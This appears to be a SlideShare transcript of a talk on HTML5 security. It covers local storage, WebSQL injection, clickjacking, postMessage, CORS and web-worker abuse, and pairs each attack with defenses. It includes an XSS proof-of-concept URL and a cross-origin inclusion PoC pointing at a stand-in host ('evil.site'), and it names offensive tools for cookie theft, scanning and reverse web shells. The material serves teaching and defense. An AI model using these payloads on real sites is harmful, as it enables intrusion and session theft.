Talk about html5 security

3,085 views
3,003 views

Published on

Talk about html5 security

Published in: Education, Technology
1 Comment
0 Likes
Statistics
Notes
  • http://www.codesec.info/talk-about-html5-security.html
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

No Downloads
Views
Total views
3,085
On SlideShare
0
From Embeds
0
Number of Embeds
846
Actions
Shares
0
Downloads
49
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

Talk about html5 security

  1. 1. youstar@insight-labs
  2. 2.  Introduction to HTML5 HTML5 threat model Vulnerabilities & Defense Tools Reference
  3. 3.  History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
  4. 4.  Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
  5. 5.  Features
  6. 6.  XSS abuse with tags and attributes Hiding URL Code Stealing from the storage Injecting and Exploiting WebSQL ClickJacking &&CookieJacking Cross Origin Request and postMessage Client‐side File Includes Botnet and widgets
  7. 7.  In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
  8. 8.  Attack:  New XSS Vector  Bypass Black-list Filter Defense:  Add new tags to Black-list  Change Regex
  9. 9.  DOM  window.history.back();  window.history.forward();  window.history.go(); HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
  10. 10. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},,location.href.split("?").shift());document.write(1)</script>http://127.0.0.1/html5/poc/history/xsspoc.php
  11. 11.  Type  LocalStorage:for long-term storage  SessionStorage:for the session application(last when the browser closed) Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB) Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  12. 12.  Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()  (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()
  13. 13.  Attack  Get the data from the storage(cookie,passwd,etc)  Storage your xss shellcode  Unlimit the path Defense  Don’t store sensitive data in local storage  Dont use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
  14. 14.  Database Storage  The same as the Google Gears Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql(); Type  SQLite (support by WebKit)
  15. 15.  Attack  Store shellcode  SQL inject Defense  Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data
  16. 16.  Store shellcode
  17. 17.  SQL Injection  Use sqlite_master ▪ SELECT name FROM sqlite_master WHERE type=table ▪ SELECT sql FROM sqlite_master WHERE name=table_name ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
  18. 18.  Drag and drop basics  Drag Data  the drag feedback image  drag effects Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
  19. 19.  ClickJacking  XSS + Drag
  20. 20.  CookieJacking  Use many technology to steal user’s local cookies Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
  21. 21.  Defense  Use iframe with sandbox  If (top !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href
  22. 22.  postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
  23. 23.  Defense  Check the postMessage origin  Don’t use innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage
  24. 24.  Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
  25. 25.  Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ (Flash crossdomain.xml )  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}
  26. 26.  Code like this:<html><body><script>x = new XMLHttpRequest();x.open("GET",location.hash.substring(1));x.onreadystatechange=function(){if(x.readyState==4){document.getElementById("main").innerHTML=x.responseText;}}x.send();</script><div id=“main”></div></body></html> POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
  27. 27.  Web Workers  running scripts in the background independently  Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects
  28. 28.  Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address
  29. 29.  COR+XSS+Workers=shell of the future
  30. 30.  HTML5CSdump  enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name JS-Recon  Port Scans  Network Scans  Detecting private IP address
  31. 31.  Imposter  Steal cookies  Set cookies  Steal Local Shared Objects  Steal stored passwords from FireFox  etc Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures
  32. 32.  Ravan  JavaScript based Distributed Computing system  hashing algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512
  33. 33.  HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger Abusing HTML 5 Structured Client-side Storage:Alberto Trivero Cookiejacking:Rosario Valotta http://heideri.ch/jso/#html5 http://www.wooyun.org/bugs/wooyun-2011-02351 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html http://www.html5test.com
  34. 34.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox http://code.google.com/intl/zh-CN/apis/gears/api_database.html http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html http://www.w3.org/TR/access-control/ http://m-austin.com/blog/?p=19 https://developer.mozilla.org/en/ http://www.w3.org/TR/cors/ http://www.andlabs.org/tools/ravan.html http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
  35. 35.  Contact Me email:youstar@foxmail.com Site:  www.codesec.info  www.insight-labs.org

×